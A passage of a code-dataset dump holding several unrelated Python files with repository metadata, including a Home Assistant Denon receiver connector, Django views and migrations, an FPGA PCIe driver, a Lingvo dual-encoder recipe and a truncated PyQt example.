] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 2,668 | py | """Code to handle a DenonAVR receiver."""
from __future__ import annotations
from collections.abc import Callable
import logging
from denonavr import DenonAVR
_LOGGER = logging.getLogger(__name__)
class ConnectDenonAVR:
"""Class to async connect to a DenonAVR receiver."""
def __init__(
self,
host: str,
timeout: float,
show_all_inputs: bool,
zone2: bool,
zone3: bool,
async_client_getter: Callable,
) -> None:
"""Initialize the class."""
self._async_client_getter = async_client_getter
self._receiver: DenonAVR | None = None
self._host = host
self._show_all_inputs = show_all_inputs
self._timeout = timeout
self._zones: dict[str, str | None] = {}
if zone2:
self._zones["Zone2"] = None
if zone3:
self._zones["Zone3"] = None
@property
def receiver(self) -> DenonAVR | None:
"""Return the class containing all connections to the receiver."""
return self._receiver
async def async_connect_receiver(self) -> bool:
"""Connect to the DenonAVR receiver."""
await self.async_init_receiver_class()
assert self._receiver
if (
self._receiver.manufacturer is None
or self._receiver.name is None
or self._receiver.model_name is None
or self._receiver.receiver_type is None
):
_LOGGER.error(
"Missing receiver information: manufacturer '%s', name '%s', model '%s', type '%s'",
self._receiver.manufacturer,
self._receiver.name,
self._receiver.model_name,
self._receiver.receiver_type,
)
return False
_LOGGER.debug(
"%s receiver %s at host %s connected, model %s, serial %s, type %s",
self._receiver.manufacturer,
self._receiver.name,
self._receiver.host,
self._receiver.model_name,
self._receiver.serial_number,
self._receiver.receiver_type,
)
return True
async def async_init_receiver_class(self) -> None:
"""Initialize the DenonAVR class asynchronously."""
receiver = DenonAVR(
host=self._host,
show_all_inputs=self._show_all_inputs,
timeout=self._timeout,
add_zones=self._zones,
)
# Use httpx.AsyncClient getter provided by Home Assistant
receiver.set_async_client_getter(self._async_client_getter)
await receiver.async_setup()
self._receiver = receiver
| [
"[email protected]"
] | |
8bfbca51d0b37ee289502c1fbaaf5efe3b2fda3e | debffca14a39dbeaf6af2f1b73ea530913e2cdad | /astromodels/tests/test_load_xspec_models.py | e10e14154daf319d6f29bd8409ebbdc01001fd9b | [
"BSD-3-Clause"
] | permissive | BjoernBiltzinger/astromodels | 6986695abfc4510a62254854fd0977b1e96e192f | d94a3d3bc607def2b5e3cd145c3922e0a00a7b15 | refs/heads/master | 2022-11-03T19:28:16.949036 | 2019-03-12T17:05:59 | 2019-03-12T17:05:59 | 175,420,543 | 0 | 0 | BSD-3-Clause | 2019-03-13T12:53:03 | 2019-03-13T12:53:03 | null | UTF-8 | Python | false | false | 641 | py | import pytest
import astropy.units as u
try:
from astromodels.xspec import *
except:
has_XSPEC = False
else:
has_XSPEC = True
# This defines a decorator which can be applied to single tests to
# skip them if the condition is not met
skip_if_xspec_is_not_available = pytest.mark.skipif(not has_XSPEC,
reason="XSPEC not available")
@skip_if_xspec_is_not_available
def test_xspec_load():
# no need to do anything really
s = XS_phabs() * XS_powerlaw() + XS_bbody()
print(s(1.0))
s.set_units(u.keV, 1 / (u.keV * u.cm**2 * u.s))
print(s(1.0 * u.keV))
| [
"[email protected]"
] | |
0aab616a8c0ca629a1f4e434c91a20302f47285b | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/monitoring/metricsscope/v1/monitoring-metricsscope-v1-py/google/monitoring/metricsscope_v1/__init__.py | 1530640d664a0943bb90109a53b0c43ead78fa5b | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,521 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .services.metrics_scopes import MetricsScopesClient
from .services.metrics_scopes import MetricsScopesAsyncClient
from .types.metrics_scope import MetricsScope
from .types.metrics_scope import MonitoredProject
from .types.metrics_scopes import CreateMonitoredProjectRequest
from .types.metrics_scopes import DeleteMonitoredProjectRequest
from .types.metrics_scopes import GetMetricsScopeRequest
from .types.metrics_scopes import ListMetricsScopesByMonitoredProjectRequest
from .types.metrics_scopes import ListMetricsScopesByMonitoredProjectResponse
from .types.metrics_scopes import OperationMetadata
__all__ = (
'MetricsScopesAsyncClient',
'CreateMonitoredProjectRequest',
'DeleteMonitoredProjectRequest',
'GetMetricsScopeRequest',
'ListMetricsScopesByMonitoredProjectRequest',
'ListMetricsScopesByMonitoredProjectResponse',
'MetricsScope',
'MetricsScopesClient',
'MonitoredProject',
'OperationMetadata',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
b4d83d9b56e607732cd70a9353169eb6c897b04c | 2a2435c1955f61727c9968ea87a599d6e999c1bd | /core/migrations/0010_billingaddress.py | 88d7b724fb03f794792b0d947aca41ec9c668d05 | [] | no_license | mahmoudabuelnaga/dje-commerce | 9a5ba483b568613860d55c6062a01cd08ff9466c | 964917da53dc6045c4374943fce68d7de0edad37 | refs/heads/master | 2020-12-15T17:59:11.443834 | 2020-02-23T23:55:29 | 2020-02-23T23:55:29 | 235,202,147 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,042 | py | # Generated by Django 2.2 on 2020-01-20 02:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('core', '0009_auto_20200119_0012'),
]
operations = [
migrations.CreateModel(
name='BillingAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('street_address', models.CharField(max_length=255)),
('apartment_address', models.CharField(max_length=255)),
('countries', django_countries.fields.CountryField(max_length=746, multiple=True)),
('zip', models.CharField(max_length=100)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
d1df2196740c711b82b68bf80a7a61e19b6efa9f | 84b99814136f134fc2238a266225ed8342b6ede0 | /artemis_pcie/artemis_pcie.py | 467fc4772e63824248331ac13bb98a51834d7d05 | [
"MIT"
] | permissive | CospanDesign/nysa-artemis-pcie-platform | 1f25f3e940c43acc631d9c0cb1ecdee26e846af0 | 844be4b14b27520eb4bb15b8a2f18d7797b91943 | refs/heads/master | 2021-01-21T04:35:18.492160 | 2016-07-04T20:25:43 | 2016-07-04T20:25:43 | 48,339,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,373 | py | """ artemis_pcie
Concrete interface for Nysa on the artemis_pcie board
"""
__author__ = '[email protected]'
import sys
import os
import time
from collections import OrderedDict
from array import array as Array
from nysa.cbuilder.sdb import SDBError
from nysa.host.nysa import Nysa
from nysa.host.nysa import NysaError
from nysa.host.nysa import NysaCommError
from nysa.host.driver.utils import dword_to_array
from nysa.host.driver.utils import array_to_dword
from nysa.common.print_utils import print_32bit_hex_array
IDWORD = 0xCD15DBE5
CMD_COMMAND_RESET = 0x0080
CMD_PERIPHERAL_WRITE = 0x0081
CMD_PERIPHERAL_WRITE_FIFO = 0x0082
CMD_PERIPHERAL_READ = 0x0083
CMD_PERIPHERAL_READ_FIFO = 0x0084
CMD_MEMORY_WRITE = 0x0085
CMD_MEMORY_READ = 0x0086
CMD_DMA_WRITE = 0x0087
CMD_DMA_READ = 0x0088
CMD_PING = 0x0089
CMD_READ_CONFIG = 0x008A
BAR0_ADDR = 0x00000000
STATUS_BUFFER_ADDRESS = 0x01000000
WRITE_BUFFER_A_ADDRESS = 0x02000000
WRITE_BUFFER_B_ADDRESS = 0x03000000
READ_BUFFER_A_ADDRESS = 0x04000000
READ_BUFFER_B_ADDRESS = 0x05000000
BUFFER_SIZE = 0x00000400
MAX_PACKET_SIZE = 0x40
#Register Values
HDR_STATUS_BUF_ADDR = "status_buf"
HDR_BUFFER_READY = "hst_buffer_rdy"
HDR_WRITE_BUF_A_ADDR = "write_buffer_a"
HDR_WRITE_BUF_B_ADDR = "write_buffer_b"
HDR_READ_BUF_A_ADDR = "read_buffer_a"
HDR_READ_BUF_B_ADDR = "read_buffer_b"
HDR_BUFFER_SIZE = "dword_buffer_size"
HDR_INDEX_VALUEA = "index value a"
HDR_INDEX_VALUEB = "index value b"
HDR_DEV_ADDR = "device_addr"
STS_DEV_STATUS = "device_status"
STS_BUF_RDY = "dev_buffer_rdy"
STS_BUF_POS = "hst_buf_addr"
STS_INTERRUPT = "interrupt"
HDR_AUX_BUFFER_READY = "hst_buffer_rdy"
REGISTERS = OrderedDict([
(HDR_STATUS_BUF_ADDR , "Address of the Status Buffer on host computer" ),
(HDR_BUFFER_READY , "Buffer Ready (Controlled by host)" ),
(HDR_WRITE_BUF_A_ADDR , "Address of Write Buffer 0 on host computer" ),
(HDR_WRITE_BUF_B_ADDR , "Address of Write Buffer 1 on host computer" ),
(HDR_READ_BUF_A_ADDR , "Address of Read Buffer 0 on host computer" ),
(HDR_READ_BUF_B_ADDR , "Address of Read Buffer 1 on host computer" ),
(HDR_BUFFER_SIZE , "Size of the buffer on host computer" ),
(HDR_INDEX_VALUEA , "Value of Index A" ),
(HDR_INDEX_VALUEB , "Value of Index B" ),
(HDR_DEV_ADDR , "Address to read from or write to on device" ),
(STS_DEV_STATUS , "Device Status" ),
(STS_BUF_RDY , "Buffer Ready Status (Controller from device)" ),
(STS_BUF_POS , "Address on Host" ),
(STS_INTERRUPT , "Interrupt Status" ),
(HDR_AUX_BUFFER_READY , "Buffer Ready (Controlled by host)" )
])
SB_READY = "ready"
SB_WRITE = "write"
SB_READ = "read"
SB_FIFO = "flag_fifo"
SB_PING = "ping"
SB_READ_CFG = "read_cfg"
SB_UNKNOWN_CMD = "unknown_cmd"
SB_PPFIFO_STALL = "ppfifo_stall"
SB_HOST_BUF_STALL = "host_buf_stall"
SB_PERIPH = "flag_peripheral"
SB_MEM = "flag_mem"
SB_DMA = "flag_dma"
SB_INTERRUPT = "interrupt"
SB_RESET = "reset"
SB_DONE = "done"
SB_CMD_ERR = "error"
STATUS_BITS = OrderedDict([
(SB_READY , "Ready for new commands" ),
(SB_WRITE , "Write Command Enabled" ),
(SB_READ , "Read Command Enabled" ),
(SB_FIFO , "Flag: Read/Write FIFO" ),
(SB_PING , "Ping Command" ),
(SB_READ_CFG , "Read Config Request" ),
(SB_UNKNOWN_CMD , "Unknown Command" ),
(SB_PPFIFO_STALL , "Stall Due to Ping Pong FIFO" ),
(SB_HOST_BUF_STALL , "Stall Due to Host Buffer" ),
(SB_PERIPH , "Flag: Peripheral Bus" ),
(SB_MEM , "Flag: Memory" ),
(SB_DMA , "Flag: DMA" ),
(SB_INTERRUPT , "Device Initiated Interrupt" ),
(SB_RESET , "Reset Command" ),
(SB_DONE , "Command Done" ),
(SB_CMD_ERR , "Error executing command" )
])
ARTEMIS_MEMORY_OFFSET = 0x0100000000
class ArtemisPcie(Nysa):
def __init__(self, path, status = None):
Nysa.__init__(self, status)
self.path = path
self.dev = None
self.dev = os.open(path, os.O_RDWR)
def set_command_mode(self):
#XXX: Change this to a seperate file
os.lseek(self.dev, 0, os.SEEK_END)
def set_data_mode(self):
#XXX: Change this to a seperate file
os.lseek(self.dev, 0, os.SEEK_SET)
def set_dev_addr(self, address):
self.dev_addr = address
reg = NysaPCIEConfig.get_config_reg(HDR_DEV_ADDR)
self.write_pcie_reg(reg, address)
def write_pcie_reg(self, address, data):
d = Array('B')
d.extend(dword_to_array(address))
d.extend(dword_to_array(data))
self.set_command_mode()
#self.dev.write(d)
os.write(self.dev, d)
self.set_data_mode()
def write_pcie_command(self, command, count, address):
d = Array('B')
d.extend(dword_to_array(command))
d.extend(dword_to_array(count))
d.extend(dword_to_array(address))
self.set_command_mode()
#self.dev.write(d)
os.write(self.dev, d)
self.set_data_mode()
def read(self, address, length = 1, disable_auto_inc = False):
"""read
Generic read command used to read data from a Nysa image
Args:
length (int): Number of 32 bit words to read from the FPGA
address (int): Address of the register/memory to read
disable_auto_inc (bool): if true, auto increment feature will be disabled
Returns:
(Array of unsigned bytes): A byte array containtin the raw data
returned from Nysa
Raises:
NysaCommError: When a failure of communication is detected
"""
#print "Read"
d = Array('B')
if length == 0:
length = 1
command = 0x00000002
d.extend(dword_to_array(IDWORD))
if address >= ARTEMIS_MEMORY_OFFSET:
address -= ARTEMIS_MEMORY_OFFSET
command |= 0x10000
if disable_auto_inc:
command |= 0x20000
d.extend(dword_to_array(command))
d.extend(dword_to_array(length))
d.extend(dword_to_array(address))
hdr_byte_len = len(d)
hdr_dword_len = hdr_byte_len / 4
self.write_pcie_command(CMD_PERIPHERAL_WRITE, hdr_dword_len, 0x00)
os.write(self.dev, d)
self.write_pcie_command(CMD_PERIPHERAL_READ, length + hdr_dword_len, 0x00)
#print "Read Command"
#print_32bit_hex_array(d)
data = Array('B', os.read(self.dev, ((length * 4) + hdr_byte_len)))
#print "Data:"
#print_32bit_hex_array(data)
return data[hdr_byte_len:]
def write(self, address, data, disable_auto_inc = False):
"""write
Generic write command usd to write data to a Nysa image
Args:
address (int): Address of the register/memory to read
data (array of unsigned bytes): Array of raw bytes to send to the
device
disable_auto_inc (bool): if true, auto increment feature will be disabled
Returns:
Nothing
Raises:
AssertionError: This function must be overriden by a board specific
implementation
"""
while (len(data) % 4) != 0:
data.append(0x00)
length = len(data) / 4
d = Array('B')
command = 0x00000001
d.extend(dword_to_array(IDWORD))
if address >= ARTEMIS_MEMORY_OFFSET:
address -= ARTEMIS_MEMORY_OFFSET
command |= 0x10000
if disable_auto_inc:
command |= 0x20000
d.extend(dword_to_array(command))
d.extend(dword_to_array(length))
d.extend(dword_to_array(address))
d.extend(data)
#print "Write Command"
self.write_pcie_command(CMD_PERIPHERAL_WRITE, (len(d) / 4), 0x00)
#print "Data:"
#print_32bit_hex_array(d)
os.write(self.dev, d)
def ping(self):
"""ping
Pings the Nysa image
Args:
Nothing
Returns:
Nothing
Raises:
NysaCommError: When a failure of communication is detected
"""
return
#raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def reset(self):
"""reset
Software reset the Nysa FPGA Master, this may not actually reset the
entire FPGA image
Args:
Nothing
Returns:
Nothing
Raises:
NysaCommError: A failure of communication is detected
"""
self.write_pcie_command(CMD_COMMAND_RESET, 0, 0)
#raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def is_programmed(self):
"""
Returns True if the FPGA is programmed
Args:
Nothing
Returns (Boolean):
True: FPGA is programmed
False: FPGA is not programmed
Raises:
NysaCommError: A failure of communication is detected
"""
return True
#raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def get_sdb_base_address(self):
"""
Return the base address of the SDB (This is platform specific)
Args:
Nothing
Returns:
32-bit unsigned integer of the address where the SDB can be read
Raises:
Nothing
"""
return 0x00000000
def wait_for_interrupts(self, wait_time = 1):
"""wait_for_interrupts
listen for interrupts for the specified amount of time
Args:
wait_time (int): the amount of time in seconds to wait for an
interrupt
Returns:
(boolean):
True: Interrupts were detected
False: No interrupts detected
Raises:
NysaCommError: A failure of communication is detected
"""
raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def register_interrupt_callback(self, index, callback):
""" register_interrupt
Setup the thread to call the callback when an interrupt is detected
Args:
index (Integer): bit position of the device
if the device is 1, then set index = 1
callback: a function to call when an interrupt is detected
Returns:
Nothing
Raises:
Nothing
"""
#raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
return
def unregister_interrupt_callback(self, index, callback = None):
""" unregister_interrupt_callback
Removes an interrupt callback from the reader thread list
Args:
index (Integer): bit position of the associated device
EX: if the device that will receive callbacks is 1, index = 1
callback: a function to remove from the callback list
Returns:
Nothing
Raises:
Nothing (This function fails quietly if ther callback is not found)
"""
#raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
return
def get_board_name(self):
return "artemis_pcie"
def upload(self, filepath):
"""
Uploads an image to a board
Args:
filepath (String): path to the file to upload
Returns:
Nothing
Raises:
NysaError:
Failed to upload data
AssertionError:
Not Implemented
"""
raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def program (self):
"""
Initiate an FPGA program sequence, THIS DOES NOT UPLOAD AN IMAGE, use
upload to upload an FPGA image
Args:
Nothing
Returns:
Nothing
Raises:
AssertionError:
Not Implemented
"""
raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def ioctl(self, name, arg = None):
"""
Platform specific functions to execute on a Nysa device implementation.
For example a board may be capable of setting an external voltage or
reading configuration data from an EEPROM. All these extra functions
cannot be encompused in a generic driver
Args:
name (String): Name of the function to execute
args (object): A generic object that can be used to pass an
arbitrary or multiple arbitrary variables to the device
Returns:
(object) an object from the underlying function
Raises:
NysaError:
An implementation specific error
"""
raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
def list_ioctl(self):
"""
Return a tuple of ioctl functions and argument types and descriptions
in the following format:
{
[name, description, args_type_object],
[name, description, args_type_object]
...
}
Args:
Nothing
Raises:
AssertionError:
Not Implemented
"""
raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
| [
"[email protected]"
] | |
e72fb5148e9d6560555da3cb66069e5cb311d78e | 147519505f3c47e5f10d9679e07d3719931b9fd0 | /my_contacts/contacts/views.py | 177a81dfd5a303c238013aa4c1cbcc9b156afbe2 | [] | no_license | grbalmeida/hello-django | 85ed28d8d47a9a2e072f3eecd13d22fb2e977a31 | 9ef261ba5faeac3de8d36eeb7efa8974e5d1e661 | refs/heads/master | 2020-08-12T10:10:48.554349 | 2019-12-20T01:18:33 | 2019-12-20T01:18:33 | 214,748,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,670 | py | from django.shortcuts import render, get_object_or_404, Http404, redirect
from django.core.paginator import Paginator
from django.db.models import Q, Value
from django.db.models.functions import Concat
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .models import Contact
@login_required(redirect_field_name='login')
def index(request):
contacts = Contact.objects.order_by('-id').filter(
show=True
)
paginator = Paginator(contacts, 2)
page = request.GET.get('p')
contacts = paginator.get_page(page)
return render(request, 'contacts/index.html', {
'contacts': contacts
})
@login_required(redirect_field_name='login')
def see_contact(request, contact_id):
contact = get_object_or_404(Contact, id=contact_id)
if not contact.show:
raise Http404()
return render(request, 'contacts/see_contact.html', {
'contact': contact
})
@login_required(redirect_field_name='login')
def search(request):
term = request.GET.get('term')
if term is None or not term:
messages.add_message(
request,
messages.WARNING,
'Term field cannot be empty'
)
return redirect('index')
fields = Concat('name', Value(' '), 'last_name')
contacts = Contact.objects.annotate(
full_name=fields
).filter(
Q(full_name__icontains=term) |
Q(phone__icontains=term)
)
paginator = Paginator(contacts, 2)
page = request.GET.get('p')
contacts = paginator.get_page(page)
return render(request, 'contacts/search.html', {
'contacts': contacts
})
| [
"[email protected]"
] | |
8dc96ae6d44f834bc6be387acb6a7d8ae7d3e972 | a9eed4d7b8d5256af9f33363761683bba32f106f | /apps/organization/migrations/0006_auto_20180620_2140.py | 98e71397529b5d6e0e4d6500af697f01abd731dc | [] | no_license | cannon-liu/mkonline | 12735d4761663ba42fdd6fe781a2658a5db1b383 | 2a1c64c10ae67abe58c1bfcd77c564fd53957067 | refs/heads/master | 2020-03-28T22:19:08.747770 | 2018-09-18T06:17:50 | 2018-09-18T06:17:50 | 149,223,626 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # Generated by Django 2.0.6 on 2018-06-20 21:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organization', '0005_auto_20180620_1655'),
]
operations = [
migrations.AlterField(
model_name='teacher',
name='image',
field=models.ImageField(upload_to='teacher/%Y/%m', verbose_name='教师图片'),
),
]
| [
"[email protected]"
] | |
50d3fa769119f65fde8c60106790dd20765218bf | effce116340b7d937bd285e43b49e1ef83d56156 | /data_files/profiler.py | 721d79980232dad6801fb4dd8236482b83610596 | [] | no_license | DL2021Spring/CourseProject | a7c7ef57d69bc1b21e3303e737abb27bee3bd585 | 108cdd906e705e9d4d05640af32d34bfc8b124da | refs/heads/master | 2023-04-11T18:52:30.562103 | 2021-05-18T09:59:59 | 2021-05-18T09:59:59 | 365,733,976 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | from cProfile import Profile
from pstats import Stats
__author__ = 'Daniel'
def demo():
f = lambda x: x
profiler = Profile()
profiler.runcall(f)
stats = Stats(profiler)
stats.strip_dirs()
stats.sort_stats('cumulative')
stats.print_stats()
stats.print_callers()
stats.print_callees()
| [
"[email protected]"
] | |
045e91eefbb6784e11a0d581027f7438c82d7ee4 | 211874c8c72ad0ff1e4d30b29f2e179161a36195 | /lingvo/tasks/milan/params/dual_encoder_recipe.py | 34d43f560fae603a1f930703f68e0a0e586a149f | [
"Apache-2.0"
] | permissive | sailfish009/lingvo | d3308260d2365477e38c4b1b61bdaa4405172b1e | 432e1b0918459c28fcfbed0e6d1a2f48a962a80f | refs/heads/master | 2023-04-19T03:15:51.420821 | 2021-04-27T22:52:45 | 2021-04-27T22:53:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,743 | py | # Lint as: python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helpers for defining Milan dual-encoder models."""
import functools
from lingvo.core import base_model_params
from lingvo.core import layers as lingvo_layers
from lingvo.core import optimizer
from lingvo.core import schedule
from lingvo.tasks.milan import constants
from lingvo.tasks.milan import dataset_spec
from lingvo.tasks.milan import dual_encoder
from lingvo.tasks.milan import input_generator
class RecipeError(Exception):
pass
class DualEncoderRecipe(base_model_params.SingleTaskModelParams):
"""Base class that simplifies configuration of Milan dual encoder models.
`DualEncoderRecipe` is a `SingleTaskModelParams` with extra builder-like
methods for configuring the dual encoder (the `Task()` params) and input
generators (`Train()`, `Dev()`, `Test()`).
In typical usage, model definitions subclass `DualEncoderRecipe`, call helper
methods in the constructor to configure the dual encoder, and specify a
`default_dataset` for the model to run on. For example::
@model_registry.RegisterSingleTaskModel
class MyExperiment(DualEncoderRecipe):
def __init__(self):
super().__init__()
self.AddModality(
'TEXT',
input_feature='text_feature',
id_feature='text_id',
encoder=MyTextEncoder.Params(),
encoder_output_dim=42)
# Preprocess the raw 'image_feature' input prior to encoding.
self.AddPreprocessor('image_feature', ImagePreprocessor.Params())
self.AddModality(
'IMAGE',
input_feature='image_feature',
id_feature='image_id',
encoder=MyImageEncoder.Params(),
encoder_output_dim=67)
@property
def default_dataset(self) -> DatasetSpec:
# Point to your dataset of choice
...
"""
def __init__(self):
# Define these members here to make pytype happy.
self.dataset = None
self.input_params = None
self.task_params = None
self.dataset = self._ChooseDatasetSpec()
# Base input params, be shared by both train and eval sets.
self.input_params = input_generator.MilanInputGenerator.Params().Set(
batch_size=64,
# Run input pipeline on each TPU host (vs. one for all hosts) to
# avoid input-boundedness.
use_per_host_infeed=True)
# Default optimization and checkpointer settings.
self.task_params = dual_encoder.MilanTask.Params()
self.task_params.train.Set(
clip_gradient_norm_to_value=1.0,
grad_norm_tracker=lingvo_layers.GradNormTracker.Params().Set(
name='grad_norm_tracker',
# Don't clip if the grad norm is already smaller than this.
grad_norm_clip_cap_min=0.1),
save_max_to_keep=2000,
save_keep_checkpoint_every_n_hours=0.1667, # At most every 10 min.
optimizer=optimizer.Adam.Params().Set(
beta1=0.9, beta2=0.999, epsilon=1e-8),
learning_rate=0.0001,
lr_schedule=schedule.StepwiseExponentialSchedule.Params().Set(
decay=0.999, num_steps_per_decay=1000),
tpu_steps_per_loop=100,
max_steps=40000)
def _ChooseDatasetSpec(self):
"""Returns the `DatasetSpec` to be used by the recipe."""
return self.default_dataset
@property
def default_dataset(self) -> dataset_spec.DatasetSpec:
"""Returns a default dataset for the recipe to use.
Subclasses should override this method to specify a dataset, or add logic
(elsewhere) to choose the dataset at runtime, falling back to this one
as the default.
"""
raise NotImplementedError()
@property
def encoder_configs(self):
return self.task_params.dual_encoder.encoder_configs
def AddModality(self, name: str, **kwargs):
config = dual_encoder.EncoderConfig().Set(**kwargs)
self.encoder_configs[name] = config
return config
def AddPreprocessor(self, input_feature, preprocessor):
self.input_params.preprocessors[input_feature] = preprocessor.Copy()
def StartFromCheckpoint(self, checkpoint_path: str):
"""Configures the recipe to start training from the given model checkpoint.
This is intended to be used in fine-tuning recipes. All variables, including
Adam accumulators, are loaded from the checkpoint except for global step
(so that it resets to 0 in new experiment) and grad norm tracker stats
(since gradients are likely to have different moments in the new
experiment).
Args:
checkpoint_path: Path of the checkpoint to start training from.
"""
self.task_params.train.init_from_checkpoint_rules = {
checkpoint_path: (
[('(.*)', '%s')],
# Don't load vars matching these regexes.
['.*grad_norm_tracker/.*', 'global_step'])
}
# Methods below implement the lingvo SingleTaskModelParams interface, allowing
# the recipe to be registered with `RegisterSingleTaskModel()`.
def Train(self):
"""Returns Params for the training dataset."""
dataset_fn = functools.partial(
self.dataset.Read,
split=constants.Split.TRAIN,
shuffle_buffer_size=1024)
return self.input_params.Copy().Set(name='Train', dataset_fn=dataset_fn)
def Dev(self):
"""Returns Params for the development dataset."""
dataset_fn = functools.partial(
self.dataset.Read, split=constants.Split.DEV, shuffle_buffer_size=0)
return self.input_params.Copy().Set(name='Dev', dataset_fn=dataset_fn)
def Test(self):
"""Returns Params for the test dataset."""
dataset_fn = functools.partial(
self.dataset.Read, split=constants.Split.TEST, shuffle_buffer_size=0)
return self.input_params.Copy().Set(name='Test', dataset_fn=dataset_fn)
def Task(self):
task_params = self.task_params.Copy()
if not task_params.dual_encoder.encoder_configs:
raise RecipeError('Must configure at least one encoder.')
assert task_params.dual_encoder.label_fn is None
task_params.dual_encoder.label_fn = self.dataset.Label
return task_params
| [
"[email protected]"
] | |
ca570fc3f6bac84c77a2c7ed692f80fdf74003e1 | d737fa49e2a7af29bdbe5a892bce2bc7807a567c | /software/qt_examples/src/pyqt-official/sql/cachedtable.py | fc5e0ccdcaaacec4422fb011786cc34c79471638 | [
"MIT",
"CC-BY-NC-SA-4.0",
"GPL-1.0-or-later",
"GPL-3.0-only"
] | permissive | TG-Techie/CASPER | ec47dfbfd6c3a668739ff4d707572e0b853518b4 | 2575d3d35e7dbbd7f78110864e659e582c6f3c2e | refs/heads/master | 2020-12-19T12:43:53.825964 | 2020-01-23T17:24:04 | 2020-01-23T17:24:04 | 235,736,872 | 0 | 1 | MIT | 2020-01-23T17:09:19 | 2020-01-23T06:29:10 | Python | UTF-8 | Python | false | false | 4,184 | py | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (QApplication, QDialog, QDialogButtonBox,
QHBoxLayout, QMessageBox, QPushButton, QTableView)
from PyQt5.QtSql import QSqlTableModel
import connection
class TableEditor(QDialog):
def __init__(self, tableName, parent=None):
super(TableEditor, self).__init__(parent)
